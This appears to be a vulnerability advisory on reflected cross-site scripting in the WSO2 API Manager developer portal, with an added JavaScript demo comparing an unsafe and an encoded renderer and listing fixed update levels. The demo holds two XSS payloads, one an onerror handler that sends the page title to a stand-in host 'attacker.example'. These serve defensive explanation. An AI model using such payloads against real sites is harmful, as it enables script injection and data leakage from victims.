WSO2 API Manager Reflected Cross-Site Scripting Vulnerability

Vulnerability

A reflected cross-site scripting vulnerability has been identified in the WSO2 API Manager developer portal. The portal reflects attacker-controlled request input into the page without adequate validation or output encoding, so script content carried in a crafted link is executed in the victim's browser, in the portal's origin, when the victim opens that link. Exploitation could redirect the user to a malicious website, alter the page's user interface, or read information accessible to script in the browser. Session hijacking by cookie theft is not possible, because the sensitive session cookies carry the httpOnly flag and cannot be read from script; that flag does not, however, stop an injected script from issuing requests with the victim's existing session for as long as the page stays open.
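The pattern behind this class of issue, as an added example that is not WSO2's code: a renderer that concatenates a query parameter straight into markup, beside a hardened version that bounds and HTML-encodes the value before output. The page does not name the reflected parameter or endpoint, so the `search` parameter, the `devportal.example` host and the payloads below are hypothetical, constructed for illustration only.

```javascript
// Added example, not code from the WSO2 developer portal. The "search"
// query parameter and the devportal.example host are hypothetical.

// Vulnerable: the query value is concatenated straight into markup, so
// whatever the crafted link carries is echoed back as HTML and runs in the
// portal's origin when the victim opens the link.
function renderUnsafe(requestUrl) {
  const term = new URL(requestUrl).searchParams.get("search") ?? "";
  return `<h2>Results for: ${term}</h2>` +
         `<input type="text" name="search" value="${term}">`;
}

// Encoder for HTML text and double-quoted attribute contexts: every
// character that can change the parser's state is replaced by an entity,
// so the value is always rendered as text, never as markup.
function encodeHtml(value) {
  const map = {
    "&": "&amp;", "<": "&lt;", ">": "&gt;",
    '"': "&quot;", "'": "&#x27;", "/": "&#x2F;",
  };
  return String(value).replace(/[&<>"'\/]/g, (ch) => map[ch]);
}

// Hardened: bound the input, then encode on output. A search field has to
// accept arbitrary text, so input validation alone cannot make it safe;
// context-correct output encoding is what stops the script from executing.
function renderSafe(requestUrl) {
  const raw = new URL(requestUrl).searchParams.get("search") ?? "";
  const safe = encodeHtml(raw.slice(0, 100));
  return `<h2>Results for: ${safe}</h2>` +
         `<input type="text" name="search" value="${safe}">`;
}

// The template itself contains exactly three tags (<h2>, </h2>, <input>).
// Any additional "<" in the rendered output must have come from the input,
// which is a simple regression check for injected markup.
const TEMPLATE_TAG_COUNT = 3;
function injectsMarkup(html) {
  return (html.match(/</g) || []).length > TEMPLATE_TAG_COUNT;
}

// Constructed payloads of the kind a crafted link would carry: one breaks
// out of the value attribute, the other relies on an event handler.
const payloads = [
  '"><script>alert(document.domain)</script>',
  "<img src=x onerror=location='https://attacker.example/?'+document.title>",
];

// Builds the crafted link for each payload and reports whether the unsafe
// and the hardened renderer let the markup through.
function compareRenderers() {
  return payloads.map((p) => {
    const link =
      `https://devportal.example/search?search=${encodeURIComponent(p)}`;
    return {
      payload: p,
      unsafeInjects: injectsMarkup(renderUnsafe(link)),
      safeInjects: injectsMarkup(renderSafe(link)),
    };
  });
}

console.table(compareRenderers());
```

Run with `node reflected-xss-demo.js`; the table shows the unsafe renderer letting both payloads through and the hardened one passing neither. The `/` entity is included so the same encoder is also safe inside closing-tag fragments; encoding is chosen per context, and a value placed into a JavaScript string or a URL attribute would need a different encoder.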

Impact

An attacker who persuades a user to open a crafted link can execute script in that user's browser within the developer portal's origin. The consequences are redirection to a malicious website, unauthorized modification of the page's user interface, and disclosure of information accessible to script in the browser. Session hijacking through cookie theft is not feasible, because the sensitive cookies carry the httpOnly flag.

Remediation

WSO2 API Manager users should update to the fixed update level for their release line: 4.1.0 (update level 187), 4.0.0 (update level 293), 3.2.1 (update level 32), or 3.2.0 (update level 408).

Added: Apr 16, 2026, 10:23 AM
Updated: Apr 16, 2026, 10:23 AM

Vulnerability Rating

Custom Algorithm

spread: 3.4
impact: 1.7
exploitability: 6.4
remediation: 7.7
relevance: 6.0
threat: 0.0
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.